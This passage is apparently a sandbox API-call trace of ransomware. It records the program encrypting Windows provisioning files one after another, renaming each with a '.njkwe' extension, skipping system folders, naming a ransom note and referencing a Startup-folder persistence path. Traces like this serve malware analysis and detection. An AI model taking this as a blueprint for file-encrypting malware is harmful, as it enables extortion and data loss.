(Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.087] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml") returned 158 [0078.087] StrStrIW (lpFirst="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.087] lstrcmpW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.087] lstrcmpW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.087] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connection", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.087] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\2__connections_cellular_djezzy (algeria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.088] GetTickCount () returned 0x1153da2 [0078.088] GetTickCount () returned 0x1153da2 [0078.088] GetTickCount () returned 0x1153da2 [0078.088] GetTickCount () returned 0x1153da2 [0078.088] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.088] GetProcessHeap () returned 0xbe0000 [0078.088] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.088] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.089] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.089] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.090] GetProcessHeap () returned 0xbe0000 [0078.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.090] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.090] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.090] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.090] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.090] CloseHandle (hObject=0x43c) returned 1 [0078.090] GetProcessHeap () returned 0xbe0000 [0078.090] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.090] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0078.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\2__connections_cellular_djezzy (algeria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\2__connections_cellular_djezzy (algeria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.091] GetProcessHeap () returned 0xbe0000 [0078.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.091] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b12dd6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b12dd6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b12dd6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="300__C~1.PRO")) returned 1 [0078.091] lstrcmpiW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.091] lstrcmpiW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.091] lstrcmpiW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.091] lstrcmpiW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.091] lstrcmpiW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.091] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml") returned 166 [0078.091] StrStrIW (lpFirst="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.091] lstrcmpW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.091] lstrcmpW (lpString1="300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.091] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.091] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\300__connections_cellular_2degrees (new zealand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.122] GetTickCount () returned 0x1153dd0 [0078.122] GetTickCount () returned 0x1153dd0 [0078.122] GetTickCount () returned 0x1153dd0 [0078.122] GetTickCount () returned 0x1153dd0 [0078.122] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.122] GetProcessHeap () returned 0xbe0000 [0078.122] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.122] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.123] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.123] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.123] GetProcessHeap () returned 0xbe0000 [0078.123] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.124] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.124] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.124] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.124] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.124] CloseHandle (hObject=0x43c) returned 1 [0078.124] GetProcessHeap () returned 0xbe0000 [0078.124] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.124] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\300__connections_cellular_2degrees (new zealand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\300__Connections_Cellular_2degrees (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\300__connections_cellular_2degrees (new zealand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.125] GetProcessHeap () returned 0xbe0000 [0078.125] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.125] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b39042, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b39042, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b39042, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="301__C~1.PRO")) returned 1 [0078.128] lstrcmpiW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.128] lstrcmpiW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.128] lstrcmpiW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.128] lstrcmpiW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.128] lstrcmpiW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.128] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml") returned 177 [0078.128] StrStrIW (lpFirst="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.128] lstrcmpW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.128] lstrcmpW (lpString1="301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.128] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.128] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\301__connections_cellular_telecom new zealand (new zealand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.128] GetTickCount () returned 0x1153dd0 [0078.128] GetTickCount () returned 0x1153dd0 [0078.128] GetTickCount () returned 0x1153dd0 [0078.128] GetTickCount () returned 0x1153dd0 [0078.128] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.128] GetProcessHeap () returned 0xbe0000 [0078.128] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.128] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0078.130] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.130] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0078.130] GetProcessHeap () returned 0xbe0000 [0078.130] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.130] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.130] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.130] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.130] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.130] CloseHandle (hObject=0x43c) returned 1 [0078.130] GetProcessHeap () returned 0xbe0000 [0078.130] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.130] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 197 [0078.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\301__connections_cellular_telecom new zealand (new zealand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\301__Connections_Cellular_Telecom New Zealand (New Zealand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\301__connections_cellular_telecom new zealand (new zealand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.131] GetProcessHeap () returned 0xbe0000 [0078.131] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.131] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b39042, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b39042, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b39042, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", cAlternateFileName="302__C~1.PRO")) returned 1 [0078.131] lstrcmpiW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.131] lstrcmpiW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.131] lstrcmpiW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.131] lstrcmpiW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.131] lstrcmpiW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.131] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml") returned 177 [0078.131] StrStrIW (lpFirst="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.131] lstrcmpW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.131] lstrcmpW (lpString1="302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.131] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.131] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\302__connections_cellular_telecom new zealand (new zealand)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.132] GetTickCount () returned 0x1153dd0 [0078.132] GetTickCount () returned 0x1153dd0 [0078.132] GetTickCount () returned 0x1153dd0 [0078.132] GetTickCount () returned 0x1153dd0 [0078.132] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.132] GetProcessHeap () returned 0xbe0000 [0078.132] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.132] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x326, lpOverlapped=0x0) returned 1 [0078.133] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.133] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x326, lpOverlapped=0x0) returned 1 [0078.134] GetProcessHeap () returned 0xbe0000 [0078.134] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.134] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.134] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.134] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.134] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.134] CloseHandle (hObject=0x43c) returned 1 [0078.134] GetProcessHeap () returned 0xbe0000 [0078.134] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.134] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 197 [0078.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\302__connections_cellular_telecom new zealand (new zealand)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\302__Connections_Cellular_Telecom New Zealand (New Zealand)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: 